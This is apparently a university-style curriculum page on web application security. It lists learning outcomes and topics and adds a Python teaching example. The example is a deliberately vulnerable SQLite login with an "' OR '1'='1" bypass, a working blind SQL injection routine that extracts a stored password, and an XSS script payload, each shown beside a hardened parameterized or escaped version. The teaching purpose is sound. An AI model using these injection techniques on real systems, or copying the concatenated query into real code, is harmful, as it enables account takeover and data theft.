Web Application Security (2020)

From CyberEdWiki

The intent of the Web Application Security Knowledge Unit is to provide students with an understanding of the technologies, tools, and practices associated with web applications and their security.


After completing the KU, students will be able to:

  1. Examine concepts of web application technologies and security issues associated with them.
  2. Describe approaches used in the development and deployment of secure web applications.
  3. Explain how web applications are operated in a secure manner.
  4. Be aware of recent trends in web attacks.


  1. Web Application Architectures
  2. Web Protocols
    • HTTP
    • HTML/CSS
    • AJAX
    • XML
    • JSON
  3. Web Application Technologies
    • Client side
    • Server side
    • Frameworks
  4. Web Security Concepts
    • Server-Side Controls
    • Authentication
    • Session Management
    • Access Controls
    • Client-Side Controls
  5. Web Vulnerabilities
    • Input-Based Vulnerabilities
      • SQL Injection
      • Blind SQL Injection
      • Cross-Site Scripting
      • Cross-Site Request Forgery
      • Sanitization
    • Web Client Vulnerabilities
      • Client scripting
      • Client plugins
    • Web Scraping
    • Application Server Vulnerabilities
      • Function-Specific Input Vulnerabilities
      • Attacking Application Logic
    • Shared Hosting Vulnerabilities
  6. Recent Attack Trends
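The following worked example is added here to illustrate the Input-Based Vulnerabilities topics listed above (SQL injection, blind SQL injection, cross-site scripting and sanitization); it is not code from the CyberEdWiki page or from the Knowledge Unit's materials. It uses an in-memory SQLite database with a single constructed user record, a deliberately vulnerable login query beside its parameterized replacement, a boolean-based blind extraction routine that uses only the vulnerable login's true/false answer as an oracle, and an HTML renderer with and without output encoding. All function and table names are hypothetical.

```python
import html
import sqlite3


def make_db():
    """Constructed sample data for this example (not from the page): one user account."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.execute("INSERT INTO users (username, password) VALUES ('alice', 'correct horse')")
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    """Deliberately vulnerable: user input is concatenated into the SQL text, so a
    quote character in the input changes the structure of the query.
    Returns True if any row matches (the attacker sees only this bit)."""
    query = ("SELECT id FROM users WHERE username = '" + username
             + "' AND password = '" + password + "'")
    return conn.execute(query).fetchone() is not None


def login_safe(conn, username, password):
    """Hardened version: a parameterized query. The SQL text is fixed and the
    driver binds the values separately, so input is never parsed as SQL."""
    row = conn.execute(
        "SELECT id FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row is not None


def blind_extract_password(conn, username, max_len=32):
    """Boolean-based blind SQL injection against login_vulnerable: no data is echoed
    back, only success/failure, yet the stored password is recovered one character
    at a time by injecting a subquery whose truth depends on that character."""
    charset = "abcdefghijklmnopqrstuvwxyz0123456789 "
    recovered = ""
    for pos in range(1, max_len + 1):
        found = None
        for ch in charset:
            # Turns "... AND password = ''" into
            # "... AND password = '' OR (SELECT substr(password,pos,1) ...) = 'ch'"
            # (the query's own closing quote terminates the injected literal).
            payload = ("' OR (SELECT substr(password, %d, 1) FROM users "
                       "WHERE username = '%s') = '%s" % (pos, username, ch))
            if login_vulnerable(conn, username, payload):
                found = ch
                break
        if found is None:
            break  # no character matched: end of the stored value
        recovered += found
    return recovered


def render_comment_vulnerable(comment):
    """Reflects user input straight into HTML; a comment containing a <script>
    tag is executed in every viewer's browser (stored/reflected XSS)."""
    return '<p class="comment">' + comment + '</p>'


def render_comment_safe(comment):
    """Output encoding: html.escape turns <, >, &, and quotes into entities, so the
    input is displayed as text rather than parsed as markup."""
    return '<p class="comment">' + html.escape(comment, quote=True) + '</p>'


if __name__ == "__main__":
    db = make_db()
    bypass = "' OR '1'='1"
    print("vulnerable login with injected password:", login_vulnerable(db, "alice", bypass))
    print("parameterized login with same input:   ", login_safe(db, "alice", bypass))
    print("blind extraction of alice's password:  ", repr(blind_extract_password(db, "alice")))
    xss = "<script>alert(1)</script>"
    print(render_comment_vulnerable(xss))
    print(render_comment_safe(xss))
```

The two login functions take identical inputs; the only difference is whether the input can reach the SQL parser. Note that the blind routine never needs an error message or a data column in the response, which is why "blind" injection is listed as a separate topic: confirming a vulnerability needs only a consistent difference in behaviour between a true and a false condition.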


NICE Framework Categories

CSEC 2017 Categories

Specialization Areas

See also

Further reading

Suggested textbooks

Suggested academic readings

Sample knowledge test

Sample skills test

Sample abilities test

Additional notes or materials

Reference ID